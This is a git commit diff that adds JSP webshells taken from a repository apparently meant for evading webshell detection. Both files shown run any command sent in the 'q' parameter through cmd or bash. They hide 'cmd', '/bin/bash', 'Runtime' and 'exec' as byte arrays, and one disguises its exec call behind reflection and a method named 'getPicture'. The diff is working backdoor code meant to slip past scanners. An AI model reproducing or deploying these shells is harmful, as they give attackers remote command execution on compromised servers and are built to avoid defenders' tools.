Add files via upload

from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/jsp author: Build By LandGrey
2024-11-10 05:44:11 +00:00 · 2018-12-20 11:33:20 +08:00 · 2018-12-20 11:33:20 +08:00 · 1ee6e0dd74
commit 1ee6e0dd74
parent a0a4b15bdf
3 changed files with 91 additions and 0 deletions
--- a/jsp/CaiDao-Webshell-Password-LandGrey.jsp
+++ b/jsp/CaiDao-Webshell-Password-LandGrey.jsp
--- a/jsp/ProcessBuilder-cmd.jsp
+++ b/jsp/ProcessBuilder-cmd.jsp
@ -0,0 +1,41 @@
+<%@ page pageEncoding="utf-8"%>
+<%@ page import="java.util.Scanner" %>
+<HTML>
+<title>Just For Fun</title>
+<BODY>
+<H3>Build By LandGrey</H3>
+<FORM METHOD="POST" NAME="form" ACTION="#">
+    <INPUT TYPE="text" NAME="q">
+    <INPUT TYPE="submit" VALUE="Fly">
+</FORM>
+
+<%
+    String op="Got Nothing";
+    String query = request.getParameter("q");
+    String fileSeparator = String.valueOf(java.io.File.separatorChar);
+    Boolean isWin;
+    if(fileSeparator.equals("\\")){
+        isWin = true;
+    }else{
+        isWin = false;
+    }
+
+    if (query != null) {
+        ProcessBuilder pb;
+        if(isWin) {
+            pb = new ProcessBuilder(new String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), query);
+        }else{
+            pb = new ProcessBuilder(new String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), query);
+        }
+        Process process = pb.start();
+        Scanner sc = new Scanner(process.getInputStream()).useDelimiter("\\A");
+        op = sc.hasNext() ? sc.next() : op;
+        sc.close();
+    }
+%>
+
+<PRE>
+    <%= op %>>
+</PRE>
+</BODY>
+</HTML>
--- a/jsp/Runtime-reflect-cmd.jsp
+++ b/jsp/Runtime-reflect-cmd.jsp
@ -0,0 +1,43 @@
+<%@ page import="java.util.Scanner" pageEncoding="UTF-8" %>
+<HTML>
+<title>Just For Fun</title>
+<BODY>
+<H3>Build By LandGrey</H3>
+
+<FORM METHOD=POST ACTION='#'>
+    <INPUT name='q' type=text>
+    <INPUT type=submit value='Fly'>
+</FORM>
+
+<%!
+    public static String getPicture(String str) throws Exception{
+        String fileSeparator = String.valueOf(java.io.File.separatorChar);
+        if(fileSeparator.equals("\\")){
+            str = new String(new byte[] {99, 109, 100, 46, 101, 120, 101, 32, 47, 67, 32}) + str;
+        }else{
+            str =  new String(new byte[] {47, 98, 105, 110, 47, 98, 97, 115, 104, 32, 45, 99, 32}) + str;
+        }
+        Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }));
+        Process e = (Process) rt.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class).invoke(rt.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 })).invoke(null, new Object[]{}),  new Object[] { str });
+        Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\A");
+        String result = "";
+        result = sc.hasNext() ? sc.next() : result;
+        sc.close();
+        return result;
+    }
+%>
+
+<%
+    String name ="Input Nothing";
+    String query = request.getParameter("q");
+    if(query != null) {
+        name = getPicture(query);
+    }
+%>
+
+<pre>
+<%= name %>
+</pre>
+
+</BODY>
+</HTML>